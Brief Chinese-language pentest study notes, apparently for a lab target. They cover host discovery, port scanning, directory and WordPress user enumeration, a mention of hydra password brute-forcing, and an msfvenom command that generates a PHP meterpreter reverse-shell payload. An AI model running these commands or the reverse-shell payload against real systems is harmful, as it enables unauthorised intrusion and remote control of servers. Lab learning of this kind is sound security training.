思路-例题-笔记
1 首先信息收集
主机发现
- arp-scan -l //扫描该网段存活的主机
- nmap 10.120.120.0/24 //扫描该网段存活的主机
- netdiscover -r 10.120.120.0【查询与该主机同一网段内存活的主机】
进行端口信息收集的扫描
Nmap -A 172.16.1.4
Nmap -p 1-65535 172.16.1.4 //进行端口扫描1-65535的所有端口扫描、有时候用得到,因为前面的端口不开放,你可以进行后面的端口扫描
-
- 2 目录爆破
└─# dirb http://172.16.1.4:8080
Dirb 172.16.1.4 /home/kali/Desktop/zidian.txt //用自定义的字典扫描端口
弱口令爆破
└─# wpscan --url http://172.16.1.4:8080/wordpress -e u
密码一般是弱口令,除非是ssh、ftp这种可以用hydra爆破的
2 查找注入点注入
查找需要注入的脚本
└─# msfvenom -l payload | grep php/*
.
生成注入的脚本
└─# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.4 lport=8888 -f raw > /home/kali/Desktop/5.php